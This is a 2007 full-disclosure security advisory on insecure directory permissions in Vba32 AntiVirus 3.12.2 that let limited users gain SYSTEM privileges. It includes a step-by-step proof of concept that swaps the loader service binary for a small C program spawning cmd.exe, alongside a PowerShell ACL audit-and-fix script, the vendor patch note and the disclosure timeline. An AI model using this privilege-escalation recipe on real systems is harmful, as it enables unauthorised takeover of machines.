=========================================================================
Team Intell Security Advisory TISA2007-12-Private
-------------------------------------------------------------------------
Vba32 AntiVirus v3.12.2 insecure file permissions
=========================================================================

Release date:  04.10.2007
Severity:      Moderately critical
Impact:        Privilege escalation
Remote:        No
Status:        Official patch available
Software:      Vba32 AntiVirus v3.12.2
Tested on:     Microsoft Windows XP SP2
Vendor:        http://www.anti-virus.by/en/
Disclosed by:  Edi Strosar (Team Intell)

Vendor's description of affected application:
=============================================
"Antivirus program for personal computers running Windows which is a
reliable and, it is crucial, quick tool to detect and neutralize computer
viruses, mail worms, trojan programs and other malware (backdoors, adware,
spyware, etc) in real time and by request."

Download link: http://www.anti-virus.by/en/personal.html

Analysis:
=========
Vba32 AntiVirus v3.12.2 is prone to a security issue which can be exploited
by LUA (limited, non-administrative) users to gain escalated privileges.

The problem is caused by the application setting insecure default
permissions (Everyone:Write) on the Vba32 installation directory and all of
its child objects. A limited user can therefore remove, manipulate, or
replace any of the application's files, including the binary of the loader
service. Because that service runs as SYSTEM, successful exploitation allows
execution of arbitrary code with SYSTEM privileges.

Proof of concept:
=================
- logon as LUA user
- rename vba32ldr.exe to vba32ldr.exe.BAK
- copy program.exe to the Vba32 installation directory
- rename program.exe to vba32ldr.exe
- restart the computer (a limited user cannot restart the service itself;
  on reboot the service control manager starts the replaced binary)
- "rootshell" ;)

Note: vba32ldr.exe is the Vba32 Loader Service, which runs as
NT AUTHORITY\SYSTEM.

Tested on Vba32 AntiVirus v3.12.2. Other versions may be affected.
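Permission audit and fix (added example):
=========================================
The following PowerShell script is an added example; it is not part of the
Team Intell advisory or of the Vba32 product. It audits an installation
directory for the condition described in the Analysis section (write-class
ACEs granted to Everyone or similarly broad groups, including ACEs inherited
down the tree), reports which service launches vba32ldr.exe and under which
account, and with -Fix applies an icacls remediation of the kind the Solution
section calls for. The default path C:\Program Files\Vba32 and matching the
service by its image path are assumptions, since the advisory gives neither
the install location nor the service name.

```powershell
# Added example, not part of the Team Intell advisory or the Vba32 product.
# Audits a directory tree for ACEs that let low-privilege principals modify
# files (the Everyone:Write condition the advisory describes), shows which
# service runs the loader binary, and optionally applies an icacls fix.
# The install path is an assumption; point -Path at the real Vba32 directory.
# Run from an elevated PowerShell prompt when using -Fix.
param(
    [string]$Path = 'C:\Program Files\Vba32',
    [switch]$Fix
)

# Principals every interactive or domain user effectively belongs to. A write
# grant to any of them is enough for the vba32ldr.exe swap in the PoC.
$BroadPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that allow creating, overwriting, deleting, renaming or re-ACLing.
# Renaming a file needs Delete on it (or DeleteSubdirectoriesAndFiles on the
# parent), which is why Delete counts as a write-class right here.
$R = [System.Security.AccessControl.FileSystemRights]
$WriteRights = [int]($R::Write -bor $R::Modify -bor $R::FullControl -bor
                     $R::Delete -bor $R::DeleteSubdirectoriesAndFiles -bor
                     $R::ChangePermissions -bor $R::TakeOwnership)

function Get-WeakAce {
    param([string]$Target)
    # Inherited ACEs are included on purpose: the advisory's bad ACE sits on
    # the install directory and flows down to every child object.
    $acl = Get-Acl -LiteralPath $Target
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $WriteRights) -eq 0) { continue }
        [pscustomobject]@{
            Path      = $Target
            Principal = $ace.IdentityReference.Value
            Rights    = $ace.FileSystemRights
            Inherited = $ace.IsInherited
        }
    }
}

function Get-WeakAcl {
    param([string]$Root)
    $items = @(Get-Item -LiteralPath $Root) +
             @(Get-ChildItem -LiteralPath $Root -Recurse -Force -ErrorAction SilentlyContinue)
    foreach ($item in $items) { Get-WeakAce -Target $item.FullName }
}

# Which service launches the loader, and under which account. The advisory
# names the binary but not the service, so match on the image path (assumption).
function Get-LoaderService {
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -like '*vba32ldr.exe*' } |
        Select-Object Name, StartName, StartMode, State, PathName
}

$weak = @(Get-WeakAcl -Root $Path)
if ($weak.Count -gt 0) {
    Write-Output "Write-class grants to broad principals under ${Path}:"
    $weak | Format-Table -AutoSize
} else {
    Write-Output "No broad write grants found under ${Path}."
}
Get-LoaderService | Format-List

if ($Fix) {
    # Remediation. First wipe explicit ACEs on every child so they inherit
    # only from the root, then replace the root ACL with explicit grants:
    # SYSTEM and Administrators may modify, Users may only read and execute,
    # so the product still runs for limited users but cannot be tampered with.
    icacls "$Path" /reset /T /C /Q
    icacls "$Path" /inheritance:r /grant:r `
        'NT AUTHORITY\SYSTEM:(OI)(CI)F' `
        'BUILTIN\Administrators:(OI)(CI)F' `
        'BUILTIN\Users:(OI)(CI)RX'
    # Verify rather than assume: re-run the audit after the change.
    $left = @(Get-WeakAcl -Root $Path)
    Write-Output "Weak ACEs remaining after fix: $($left.Count)"
}
```

The audit part runs as any user and is the check to perform on a patched
system as well; -Fix needs an elevated prompt. Exercise the product after
tightening the ACL, since the advisory itself warns that changing the
permissions may affect functionality.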
Source code for program.exe:
============================
The loader binary is replaced with a trivial program that spawns a shell;
since the service control manager starts it as NT AUTHORITY\SYSTEM, so is
the shell. On the tested Windows XP platform services share the interactive
session, which is why the cmd.exe window appears on the logged-on user's
desktop; on Windows Vista and later, session 0 isolation would keep it off
the desktop.

    #include <stdlib.h>

    int main(void)
    {
        /* Runs under the loader service's token: NT AUTHORITY\SYSTEM. */
        system("cmd.exe");
        return 0;
    }

Solution:
=========
Set proper permissions on the Vba32 installation directory and all of its
child objects: remove the Everyone:Write grant so that only SYSTEM and
Administrators can modify the files, while limited users keep read and
execute access. NOTE: this may impact functionality.

Timeline:
=========
10.08.2007 - initial vendor notification
11.08.2007 - initial vendor response
22.08.2007 - additional vendor notification
27.08.2007 - additional vendor response
24.09.2007 - patch released
04.10.2007 - public disclosure

Contact:
========
Maldin d.o.o.
Trzaska cesta 2
1000 Ljubljana - SI
tel: +386 (0)590 70 170
fax: +386 (0)590 70 177
gsm: +386 (0)31 816 400
web: www.teamintell.com
e-mail: info@teamintell.com

Disclaimer:
===========
The content of this report is purely informational and meant for educational
purposes only. Maldin d.o.o. shall in no event be liable for any damage
whatsoever, direct or implied, arising from use or spread of this
information. Any use of information in this advisory is entirely at user's
own risk.

=========================================================================

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/